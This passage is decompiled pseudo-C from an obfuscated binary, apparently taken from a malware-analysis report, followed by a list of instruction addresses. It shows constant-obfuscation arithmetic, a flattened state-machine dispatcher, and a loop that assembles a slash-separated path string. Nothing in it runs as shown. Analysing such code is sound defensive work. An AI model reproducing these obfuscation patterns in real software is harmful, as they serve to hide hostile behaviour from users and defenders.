				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E006C29E3(_t950 + 0x274, 0x400, E006D889D(0x6dc6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E006D2025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E006CF536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E006C839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E006CC769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E006C96CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E006CF536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E006D78B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E006C8736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E006D6B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E006CF536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E006D9B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E006D889D(0x6dc660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x6dca38; // 0x0
														_t790 =  *0x6dca38; // 0x0
														_t793 =  *0x6dca38; // 0x0
														E006D7C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E006D2025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x6dca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E006D511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E006CD6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E006CF536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E006D8C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E006CF536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E006CF98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

















































                                          0x006c9fe6
                                          0x006c9fed
                                          0x006c9ff6
                                          0x006c9ffe
                                          0x006ca005
                                          0x006ca006
                                          0x006ca00d
                                          0x006ca00e
                                          0x006ca00f
                                          0x006ca014
                                          0x006ca01f
                                          0x006ca022
                                          0x006ca02d
                                          0x006ca02f
                                          0x006ca038
                                          0x006ca043
                                          0x006ca048
                                          0x006ca053
                                          0x006ca067
                                          0x006ca06c
                                          0x006ca075
                                          0x006ca080
                                          0x006ca092
                                          0x006ca097
                                          0x006ca0a0
                                          0x006ca0ab
                                          0x006ca0b6
                                          0x006ca0be
                                          0x006ca0c6
                                          0x006ca0ce
                                          0x006ca0d9
                                          0x006ca0e4
                                          0x006ca0ec
                                          0x006ca0f7
                                          0x006ca102
                                          0x006ca10d
                                          0x006ca118
                                          0x006ca120
                                          0x006ca129
                                          0x006ca12e
                                          0x006ca134
                                          0x006ca13c
                                          0x006ca147
                                          0x006ca152
                                          0x006ca15a
                                          0x006ca165
                                          0x006ca177
                                          0x006ca17a
                                          0x006ca181
                                          0x006ca188
                                          0x006ca193
                                          0x006ca19b
                                          0x006ca1a0
                                          0x006ca1a8
                                          0x006ca1b0
                                          0x006ca1b8
                                          0x006ca1c0
                                          0x006ca1ca
                                          0x006ca1ce
                                          0x006ca1d4
                                          0x006ca1dc
                                          0x006ca1e7
                                          0x006ca1ef
                                          0x006ca1fa
                                          0x006ca202
                                          0x006ca206
                                          0x006ca20a
                                          0x006ca20f
                                          0x006ca217
                                          0x006ca222
                                          0x006ca22a
                                          0x006ca232
                                          0x006ca23d
                                          0x006ca248
                                          0x006ca253
                                          0x006ca25e
                                          0x006ca269
                                          0x006ca271
                                          0x006ca27c
                                          0x006ca287
                                          0x006ca292
                                          0x006ca29a
                                          0x006ca2a5
                                          0x006ca2b0
                                          0x006ca2bb
                                          0x006ca2c6
                                          0x006ca2db
                                          0x006ca2de
                                          0x006ca2df
                                          0x006ca2e6
                                          0x006ca2f1
                                          0x006ca2fc
                                          0x006ca304
                                          0x006ca30c
                                          0x006ca317
                                          0x006ca32a
                                          0x006ca331
                                          0x006ca33c
                                          0x006ca352
                                          0x006ca359
                                          0x006ca364
                                          0x006ca36f
                                          0x006ca382
                                          0x006ca389
                                          0x006ca394
                                          0x006ca39f
                                          0x006ca3aa
                                          0x006ca3b2
                                          0x006ca3bd
                                          0x006ca3c5
                                          0x006ca3cd
                                          0x006ca3d2
                                          0x006ca3da
                                          0x006ca3e5
                                          0x006ca3f0
                                          0x006ca3fb
                                          0x006ca406
                                          0x006ca411
                                          0x006ca41c
                                          0x006ca427
                                          0x006ca42f
                                          0x006ca434
                                          0x006ca43c
                                          0x006ca444
                                          0x006ca44c
                                          0x006ca460
                                          0x006ca467
                                          0x006ca472
                                          0x006ca47d
                                          0x006ca487
                                          0x006ca492
                                          0x006ca49d
                                          0x006ca4a5
                                          0x006ca4b0
                                          0x006ca4be
                                          0x006ca4c3
                                          0x006ca4ce
                                          0x006ca4d1
                                          0x006ca4d5
                                          0x006ca4da
                                          0x006ca4e2
                                          0x006ca4ea
                                          0x006ca4f2
                                          0x006ca4f7
                                          0x006ca4ff
                                          0x006ca507
                                          0x006ca512
                                          0x006ca51a
                                          0x006ca525
                                          0x006ca530
                                          0x006ca538
                                          0x006ca53d
                                          0x006ca545
                                          0x006ca54d
                                          0x006ca558
                                          0x006ca563
                                          0x006ca56e
                                          0x006ca57e
                                          0x006ca582
                                          0x006ca58a
                                          0x006ca58e
                                          0x006ca596
                                          0x006ca59e
                                          0x006ca5a6
                                          0x006ca5ab
                                          0x006ca5b3
                                          0x006ca5bb
                                          0x006ca5c6
                                          0x006ca5d1
                                          0x006ca5dc
                                          0x006ca5e7
                                          0x006ca5f2
                                          0x006ca5fd
                                          0x006ca609
                                          0x006ca60c
                                          0x006ca610
                                          0x006ca618
                                          0x006ca61d
                                          0x006ca625
                                          0x006ca638
                                          0x006ca63f
                                          0x006ca64a
                                          0x006ca652
                                          0x006ca657
                                          0x006ca65c
                                          0x006ca664
                                          0x006ca66c
                                          0x006ca679
                                          0x006ca67d
                                          0x006ca685
                                          0x006ca68d
                                          0x006ca695
                                          0x006ca6a5
                                          0x006ca6aa
                                          0x006ca6b0
                                          0x006ca6b5
                                          0x006ca6bd
                                          0x006ca6c5
                                          0x006ca6ce
                                          0x006ca6d3
                                          0x006ca6dd
                                          0x006ca6e2
                                          0x006ca6e8
                                          0x006ca6f0
                                          0x006ca6fb
                                          0x006ca706
                                          0x006ca711
                                          0x006ca719
                                          0x006ca71e
                                          0x006ca723
                                          0x006ca72b
                                          0x006ca733
                                          0x006ca73b
                                          0x006ca740
                                          0x006ca748
                                          0x006ca750
                                          0x006ca758
                                          0x006ca75d
                                          0x006ca762
                                          0x006ca76a
                                          0x006ca776
                                          0x006ca77b
                                          0x006ca785
                                          0x006ca78a
                                          0x006ca790
                                          0x006ca798
                                          0x006ca7a0
                                          0x006ca7ab
                                          0x006ca7b6
                                          0x006ca7c1
                                          0x006ca7d3
                                          0x006ca7d8
                                          0x006ca7e9
                                          0x006ca7ea
                                          0x006ca7f1
                                          0x006ca7fc
                                          0x006ca807
                                          0x006ca80f
                                          0x006ca81a
                                          0x006ca825
                                          0x006ca830
                                          0x006ca83b
                                          0x006ca846
                                          0x006ca854
                                          0x006ca858
                                          0x006ca860
                                          0x006ca868
                                          0x006ca872
                                          0x006ca87d
                                          0x006ca888
                                          0x006ca893
                                          0x006ca89b
                                          0x006ca8a0
                                          0x006ca8a5
                                          0x006ca8ad
                                          0x006ca8b5
                                          0x006ca8c0
                                          0x006ca8cb
                                          0x006ca8d6
                                          0x006ca8e1
                                          0x006ca8ec
                                          0x006ca8f7
                                          0x006ca902
                                          0x006ca90d
                                          0x006ca918
                                          0x006ca923
                                          0x006ca92b
                                          0x006ca936
                                          0x006ca941
                                          0x006ca955
                                          0x006ca95a
                                          0x006ca961
                                          0x006ca96c
                                          0x006ca977
                                          0x006ca982
                                          0x006ca989
                                          0x006ca991
                                          0x006ca99c
                                          0x006ca9a4
                                          0x006ca9ac
                                          0x006ca9b1
                                          0x006ca9b9
                                          0x006ca9c9
                                          0x006ca9cf
                                          0x006ca9d7
                                          0x006ca9df
                                          0x006ca9e7
                                          0x006ca9ef
                                          0x006ca9f8
                                          0x006ca9fd
                                          0x006caa03
                                          0x006caa0b
                                          0x006caa1e
                                          0x006caa1f
                                          0x006caa26
                                          0x006caa31
                                          0x006caa3c
                                          0x006caa44
                                          0x006caa4f
                                          0x006caa5a
                                          0x006caa65
                                          0x006caa79
                                          0x006caa80
                                          0x006caa92
                                          0x006caa99
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caaa1
                                          0x006caaa1
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaa4
                                          0x006caaaa
                                          0x00000000
                                          0x00000000
                                          0x006caab0
                                          0x006caab0
                                          0x006cadbb
                                          0x006cae14
                                          0x006cae19
                                          0x006cae2d
                                          0x006cae32
                                          0x006cae38
                                          0x006caa9d
                                          0x006caa9d
                                          0x006caa9d
                                          0x00000000
                                          0x006caa9d
                                          0x006caab6
                                          0x006caab6
                                          0x006caabc
                                          0x006cace5
                                          0x006caceb
                                          0x006cadaa
                                          0x006cadb1
                                          0x00000000
                                          0x006cacf1
                                          0x006cacf1
                                          0x006cacf7
